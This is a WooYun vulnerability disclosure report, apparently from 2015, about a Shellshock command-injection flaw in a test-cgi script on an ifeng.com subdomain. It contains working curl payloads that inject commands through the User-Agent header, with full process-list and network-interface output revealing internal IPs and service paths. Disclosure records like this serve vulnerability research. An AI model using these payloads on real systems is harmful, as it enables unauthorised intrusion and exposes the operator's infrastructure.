当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109492

漏洞标题:凤凰网某分站远程命令执行漏洞可shell入内网

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2015-04-21 20:12

修复时间:2015-06-06 09:58

公开时间:2015-06-06 09:58

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-22: 厂商已经确认,细节仅向厂商公开
2015-05-02: 细节向核心白帽子及相关领域专家公开
2015-05-12: 细节向普通白帽子公开
2015-05-22: 细节向实习白帽子公开
2015-06-06: 细节向公众公开

简要描述:

凤凰网某分站远程命令执行漏洞可shell入内网

详细说明:

shell 远程命令执行
http://hd.ifeng.com:8082/cgi-bin/test-cgi

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/bin/ps -ef" -k
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 2014 ? 00:00:54 init [3]
root 2 1 0 2014 ? 00:00:06 [migration/0]
root 3 1 0 2014 ? 00:00:32 [ksoftirqd/0]
root 4 1 0 2014 ? 00:00:06 [migration/1]
root 5 1 0 2014 ? 00:00:00 [ksoftirqd/1]
root 6 1 0 2014 ? 00:00:03 [migration/2]
root 7 1 0 2014 ? 00:00:00 [ksoftirqd/2]
root 8 1 0 2014 ? 00:00:01 [migration/3]
root 9 1 0 2014 ? 00:00:00 [ksoftirqd/3]
root 10 1 0 2014 ? 00:00:01 [migration/4]
root 11 1 0 2014 ? 00:00:00 [ksoftirqd/4]
root 12 1 0 2014 ? 00:00:01 [migration/5]
root 13 1 0 2014 ? 00:00:00 [ksoftirqd/5]
root 14 1 0 2014 ? 00:00:01 [migration/6]
root 15 1 0 2014 ? 00:00:00 [ksoftirqd/6]
root 16 1 0 2014 ? 00:00:01 [migration/7]
root 17 1 0 2014 ? 00:00:00 [ksoftirqd/7]
root 18 1 0 2014 ? 00:00:04 [events/0]
root 19 1 0 2014 ? 00:00:02 [events/1]
root 20 1 0 2014 ? 00:00:02 [events/2]
root 21 1 0 2014 ? 00:00:01 [events/3]
root 22 1 0 2014 ? 00:00:02 [events/4]
root 23 1 0 2014 ? 00:00:01 [events/5]
root 24 1 0 2014 ? 00:00:01 [events/6]
root 25 1 0 2014 ? 00:00:02 [events/7]
root 26 18 0 2014 ? 00:00:00 [khelper]
root 27 18 0 2014 ? 00:00:00 [kacpid]
root 75 18 0 2014 ? 00:00:00 [kblockd/0]
root 76 18 0 2014 ? 00:00:00 [kblockd/1]
root 77 18 0 2014 ? 00:00:00 [kblockd/2]
root 78 18 0 2014 ? 00:00:00 [kblockd/3]
root 79 18 0 2014 ? 00:00:00 [kblockd/4]
root 80 18 0 2014 ? 00:00:00 [kblockd/5]
root 81 18 0 2014 ? 00:00:00 [kblockd/6]
root 82 18 0 2014 ? 00:00:00 [kblockd/7]
root 83 1 0 2014 ? 00:00:00 [khubd]
root 102 1 0 2014 ? 00:11:57 [kswapd0]
root 103 18 0 2014 ? 00:00:00 [aio/0]
root 104 18 0 2014 ? 00:00:00 [aio/1]
root 105 18 0 2014 ? 00:00:00 [aio/2]
root 106 18 0 2014 ? 00:00:00 [aio/3]
root 107 18 0 2014 ? 00:00:00 [aio/4]
root 108 18 0 2014 ? 00:00:00 [aio/5]
root 109 18 0 2014 ? 00:00:00 [aio/6]
root 110 18 0 2014 ? 00:00:00 [aio/7]
root 254 1 0 2014 ? 00:00:00 [kseriod]
nobody 327 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start
root 535 1 0 2014 ? 00:00:00 [scsi_eh_0]
root 576 1 0 2014 ? 00:29:55 [kjournald]
root 1103 19 0 2014 ? 00:00:00 [kauditd]
nobody 1671 4158 0 Apr19 ? 00:00:08 /home/abeight/apache/bin/httpd -k start
root 1840 1 0 2014 ? 00:00:00 udevd
zqma 2249 1 0 2014 ? 10:20:20 /usr/java/jdk1.5.0_14/bin/java -jar /home/zqma/smsServer/guodu/sms.jar
root 2727 1 0 2014 ? 00:00:00 [kjournald]
root 2728 1 0 2014 ? 00:06:36 [kjournald]
root 2729 1 0 2014 ? 00:02:05 [kjournald]
root 3730 1 0 2014 ? 00:25:33 syslogd -m 0
root 3734 1 0 2014 ? 00:00:00 klogd -x
root 3747 1 0 2014 ? 00:03:08 irqbalance
root 3826 1 0 2014 ? 00:00:00 /usr/sbin/acpid
root 3887 1 0 2014 ? 00:10:40 /usr/sbin/sshd
root 3900 1 0 2014 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
nobody 3910 1 0 2014 ? 00:20:01 /usr/sbin/gmond
root 3919 1 0 2014 ? 00:00:58 crond
xfs 3949 1 0 2014 ? 00:00:00 xfs -droppriv -daemon
root 3966 1 0 2014 ? 00:00:00 /usr/sbin/atd
dbus 3976 1 0 2014 ? 00:00:00 dbus-daemon-1 --system
root 3985 1 0 2014 ? 00:00:07 hald
root 4158 1 0 2014 ? 00:00:08 /home/abeight/apache/bin/httpd -k start
root 4159 4158 0 2014 ? 00:02:54 /home/abeight/apache/bin/rotatelogs /home/abeight/apache/logs/access_log.%Y-%m-%d 86400 480
daemon 4765 4842 0 Apr20 ? 00:00:01 /home/absearch/apache/bin/httpd -k start
root 4842 1 0 2014 ? 00:00:00 /home/absearch/apache/bin/httpd -k start
root 4843 4842 0 2014 ? 00:00:22 /home/absearch/apache/bin/rotatelogs /home/absearch/apache/logs/access_log.%Y-%m-%d 86400 480
daemon 4844 4842 0 2014 ? 00:00:00 /home/absearch/apache/bin/httpd -k start
absearch 4845 1 0 2014 ? 00:01:20 ./filter_svr
absearch 4848 4845 99 2014 ? 234-05:55:06 ./filter_svr
absearch 4859 1 0 2014 ? 00:01:25 ./mobile_filter_svr
absearch 4861 4859 0 2014 ? 00:04:49 ./mobile_filter_svr
zqma 4866 9559 0 Apr20 ? 00:12:26 /home/wap/apache/bin/httpd -k start
absearch 4875 1 0 2014 ? 00:01:14 ./spy_client
root 5142 1 0 2014 tty1 00:00:00 /sbin/mingetty tty1
root 5143 1 0 2014 tty2 00:00:00 /sbin/mingetty tty2
root 5144 1 0 2014 tty3 00:00:00 /sbin/mingetty tty3
root 5145 1 0 2014 tty4 00:00:00 /sbin/mingetty tty4
root 5146 1 0 2014 tty5 00:00:00 /sbin/mingetty tty5
root 5147 1 0 2014 tty6 00:00:00 /sbin/mingetty tty6
zqma 5297 9559 0 05:31 ? 00:08:40 /home/wap/apache/bin/httpd -k start
root 6158 1 0 2014 ? 00:00:00 perl /home/wap/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root 6160 6158 1 2014 ? 2-14:05:46 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1536M -XX:MaxPermSize=256m -DLOG_ROOT=/home/wap/log -Xss1m -Dresin.home=/home/wap/resin -Dserver.root=/home/wap/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 33132 -stdout /home/wap/resin/log/stdout.log -stderr /home/wap/resin/log/stderr.log
zqma 6260 9559 0 Apr20 ? 00:12:33 /home/wap/apache/bin/httpd -k start
zqma 6262 9559 0 Apr20 ? 00:12:03 /home/wap/apache/bin/httpd -k start
zqma 6263 9559 0 Apr20 ? 00:12:36 /home/wap/apache/bin/httpd -k start
nobody 6318 4158 0 Apr20 ? 00:00:03 /home/abeight/apache/bin/httpd -k start
root 7644 25 0 Mar13 ? 00:00:00 [pdflush]
zqma 8156 9559 0 Apr17 ? 00:58:09 /home/wap/apache/bin/httpd -k start
root 9287 1 0 2014 ? 00:00:00 perl /home/abeight/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root 9289 9287 0 2014 ? 1-14:12:34 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1024M -DLOG_ROOT=/home/abeight/log -Xss1m -Dresin.home=/home/abeight/resin -Dserver.root=/home/abeight/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 34614 -stdout /home/abeight/resin/log/stdout.log -stderr /home/abeight/resin/log/stderr.log
root 9559 1 0 Mar13 ? 00:00:47 /home/wap/apache/bin/httpd -k start
root 9562 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root 9563 9559 0 Mar13 ? 00:00:01 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/wapphp_log.%Y-%m-%d 86400 480
root 9564 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/mxiu_log.%Y-%m-%d 86400 480
root 9565 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/wxp_log.%Y-%m-%d 86400 480
root 9566 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/html5_log.%Y-%m-%d 86400 480
root 9567 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/abeight/apache/logs/access_log.%Y-%m-%d 86400 480
root 9568 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/youhui_access_log.%Y-%m-%d 86400 480
root 9576 9559 0 Mar13 ? 00:00:00 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root 9577 9559 0 Mar13 ? 00:00:05 /home/wap/apache/bin/rotatelogs /home/wap/apache/logs/access_log.%Y-%m-%d 86400 480
root 9626 1 0 2014 ? 00:00:00 perl /home/client/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root 9628 9626 1 2014 ? 2-01:20:13 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1024M -DLOG_ROOT=/home/client/log -Xss1m -Dresin.home=/home/client/resin -Dserver.root=/home/client/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 34727 -stdout /home/client/resin/log/stdout.log -stderr /home/client/resin/log/stderr.log
daemon 10271 4842 0 Apr20 ? 00:00:00 /home/absearch/apache/bin/httpd -k start
root 10960 1 0 2014 ? 00:00:00 perl /home/abcloud/resin/bin/wrapper.pl -chdir -name httpd -class com.caucho.server.resin.Resin start
root 10962 10960 0 2014 ? 14:35:56 /usr/java/jdk1.5.0_14/bin/java -Xms512M -Xmx1536M -XX:MaxPermSize=256m -DLOG_ROOT=/home/abcloud/log -Xss1m -Dresin.home=/home/abcloud/resin -Dserver.root=/home/abcloud/resin -Djava.util.logging.manager=com.caucho.log.LogManagerImpl -Djavax.management.builder.initial=com.caucho.jmx.MBeanServerBuilderImpl com.caucho.server.resin.Resin -socketwait 39341 -stdout /home/abcloud/resin/log/stdout.log -stderr /home/abcloud/resin/log/stderr.log
daemon 11705 4842 0 Apr20 ? 00:00:00 /home/absearch/apache/bin/httpd -k start
zqma 12293 9559 0 Apr17 ? 00:52:12 /home/wap/apache/bin/httpd -k start
zqma 12302 9559 0 Apr17 ? 00:51:36 /home/wap/apache/bin/httpd -k start
zqma 12311 9559 0 Apr17 ? 00:52:07 /home/wap/apache/bin/httpd -k start
zqma 12337 9559 0 Apr17 ? 00:51:59 /home/wap/apache/bin/httpd -k start
lxu 15501 1 0 Apr09 ? 00:00:00 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu 15502 15501 0 Apr09 ? 00:00:33 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu 15503 15501 0 Apr09 ? 00:01:40 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu 15505 15501 0 Apr09 ? 00:01:38 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu 15506 15501 0 Apr09 ? 00:01:40 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
lxu 15507 15501 0 Apr09 ? 00:00:00 /usr/local/zabbix/sbin/zabbix_agentd -c /home/lxu/zabbix_agentd.conf
root 17309 1 0 Mar14 ? 00:00:00 ha_logd: read process
root 17310 17309 0 Mar14 ? 00:00:00 ha_logd: write process
root 17390 1 0 Mar14 ? 00:00:01 heartbeat: master control process
nobody 17395 17390 0 Mar14 ? 00:00:00 heartbeat: FIFO reader
nobody 17396 17390 0 Mar14 ? 00:00:00 heartbeat: write: ucast eth1
nobody 17397 17390 0 Mar14 ? 00:00:00 heartbeat: read: ucast eth1
nobody 17398 17390 0 Mar14 ? 00:00:00 heartbeat: write: ping_group group1
nobody 17399 17390 0 Mar14 ? 00:00:02 heartbeat: read: ping_group group1
root 17683 17390 0 Mar14 ? 00:00:00 /usr/lib/heartbeat/ipfail
root 18100 1 0 Mar14 ? 01:38:55 /usr/bin/perl -w /etc/ha.d/resource.d/ldirectord start
root 22956 1 0 2014 ? 00:00:00 /bin/sh /usr/bin/mysqld_safe --defaults-file=/etc/my.cnf --pid-file=/var/run/mysqld/mysqld.pid
mysql 22990 22956 0 2014 ? 09:54:18 /usr/libexec/mysqld --defaults-file=/etc/my.cnf --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --socket=/var/lib/mysql/mysql.sock
nobody 26370 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start
nobody 26829 4158 0 19:41 ? 00:00:00 /home/abeight/apache/bin/httpd -k start
absearch 27339 4875 0 Mar12 ? 00:01:23 ./spy_client
root 27393 21 0 Mar12 ? 00:00:00 [pdflush]
nobody 30155 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start
nobody 30868 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start
root 30898 3919 0 20:10 ? 00:00:00 crond
root 30901 3919 0 20:10 ? 00:00:00 crond
zqma 30905 30898 0 20:10 ? 00:00:00 [php] <defunct>
zqma 30908 30901 0 20:10 ? 00:00:00 [php] <defunct>
root 30911 3919 0 20:10 ? 00:00:00 crond
zqma 30912 30911 0 20:10 ? 00:00:00 [php] <defunct>
zqma 30914 30901 0 20:10 ? 00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
zqma 30915 30898 0 20:10 ? 00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
zqma 30916 30911 0 20:10 ? 00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t
nobody 31018 30868 0 20:10 ? 00:00:00 /bin/sh /home/abeight/apache/cgi-bin/test-cgi
nobody 31019 31018 0 20:10 ? 00:00:00 /bin/ps -ef
nobody 31388 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start
nobody 32736 4158 0 Apr19 ? 00:00:09 /home/abeight/apache/bin/httpd -k start

漏洞证明:

curl http://hd.ifeng.com:8082/cgi-bin/test-cgi -A "() { foo;};echo;/sbin/ifconfig -a" -k
eth0 Link encap:Ethernet HWaddr 00:1E:C9:AB:39:06
inet addr:60.28.211.168 Bcast:60.28.211.191 Mask:255.255.255.224
inet6 addr: fe80::21e:c9ff:feab:3906/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:341276601 errors:0 dropped:9526 overruns:0 frame:0
TX packets:4100318771 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4133950569 (3.8 GiB) TX bytes:1787666000 (1.6 GiB)
Interrupt:169 Memory:f4000000-f4012100
eth0:0 Link encap:Ethernet HWaddr 00:1E:C9:AB:39:06
inet addr:60.28.211.184 Bcast:60.28.211.184 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:169 Memory:f4000000-f4012100
eth1 Link encap:Ethernet HWaddr 00:1E:C9:AB:39:04
inet addr:192.168.2.25 Bcast:192.168.2.255 Mask:255.255.255.0
inet6 addr: fe80::21e:c9ff:feab:3904/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1526075170 errors:0 dropped:0 overruns:0 frame:0
TX packets:1792435524 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4141413214 (3.8 GiB) TX bytes:4217469612 (3.9 GiB)
Interrupt:169 Memory:f8000000-f8012100
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:671302327 errors:0 dropped:0 overruns:0 frame:0
TX packets:671302327 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:99272102 (94.6 MiB) TX bytes:99272102 (94.6 MiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

修复方案:

更新补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-22 09:56

厂商回复:

非常感谢您对凤凰网信息安全的帮助,该业务是爱帮的业务,服务器和网络都是爱帮的,我们暂时联系不到相关负责人,如果可以的话,该漏洞可以在http://www.wooyun.org/corps/爱帮网那边再提交一次。谢谢。

最新状态:

暂无


漏洞评价:

评论